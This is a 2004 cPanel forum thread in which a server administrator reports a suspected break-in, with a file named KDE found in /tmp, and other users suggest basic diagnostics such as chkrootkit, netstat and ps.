The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hacked - help please

Discussion in 'General Discussion' started by Tagor, Jun 21, 2004.

  1. Tagor

    Tagor Well-Known Member

    Joined:
    Mar 6, 2004
    Messages:
    193
    Likes Received:
    0
    Trophy Points:
    16
    Yesterday night I received a message that my server was down for about one hour. Because we have had several attacks before we have secured our server. However the security seems to be not 100% secure. We have installed a firewall (APF) that has ddos protection and filters some ip addresses using dshield. I also secured the /tmp folder using scripts/securetmp. However I found a file in the /tmp folder called KDE.

    (1) is there a way to check if this script was runned in /tmp?
    (2) is there a way to see what happened before the server went down?
    (3) are there any logs about who gained access to /tmp?
    (4) is there a way to find out who uploaded that file?
    (5) is there a way to search in the .php files in /home/ for uploaders who may have uploaded the file?
    (6) is there a way to check if someone can execute files as nobody in the /tmp folder? (does anyone have a simple program to check this?)

    Below I will post the file that was uploaded and the traffic stats of my server.

    Many thanks in advance for helping me!!
     

    Attached Files:

    • kde.tar
      File size:
      20 KB
      Views:
      11
  2. Tagor

    Tagor Well-Known Member

    Joined:
    Mar 6, 2004
    Messages:
    193
    Likes Received:
    0
    Trophy Points:
    16
    And here are the traffic stats.
     

    Attached Files:

  3. Tagor

    Tagor Well-Known Member

    Joined:
    Mar 6, 2004
    Messages:
    193
    Likes Received:
    0
    Trophy Points:
    16
    I just found this in WHM:

    It doesn't say anything for me, but maybe someone know what this does?
     
  4. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    The first thing you need to ensure is that you weren't compromised and that the hacker still doesn't have access.

    Check all running processes, run chkrootkit and do a port scan on your server.

    netstat -an
    ps -aux


    Then go through and start looking at your log files and find which user account the file came through from.
    You might want to look for something such as wget or even the filename itself.

    If you're not feeling good about this then hire someone else to take a look as well. A second opinion and eyes can never hurt.
     
  5. Tagor

    Tagor Well-Known Member

    Joined:
    Mar 6, 2004
    Messages:
    193
    Likes Received:
    0
    Trophy Points:
    16
    First, thanks a lot, ramprage!

    I already ran chkrootkit and it didn't find anything except bindshell (but that is normal if you have cPanel installed).

    I removed the kde file from /tmp so the person cannot start it again.

    Would you mind answering the 6 questions above so I can find out some more information?

    Here are some thinks I have some doubt about:

    I really appreciate your help and I have also often used your great web site :).
     
  6. Tagor

    Tagor Well-Known Member

    Joined:
    Mar 6, 2004
    Messages:
    193
    Likes Received:
    0
    Trophy Points:
    16
  7. netwrkr

    netwrkr Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    Any chance of you researching your questions rather than have someone spoon feed you the answers?


    Give a man a fish and he will eat for a day; teach a man to fish and he will have food for life.
     
Loading...

Share This Page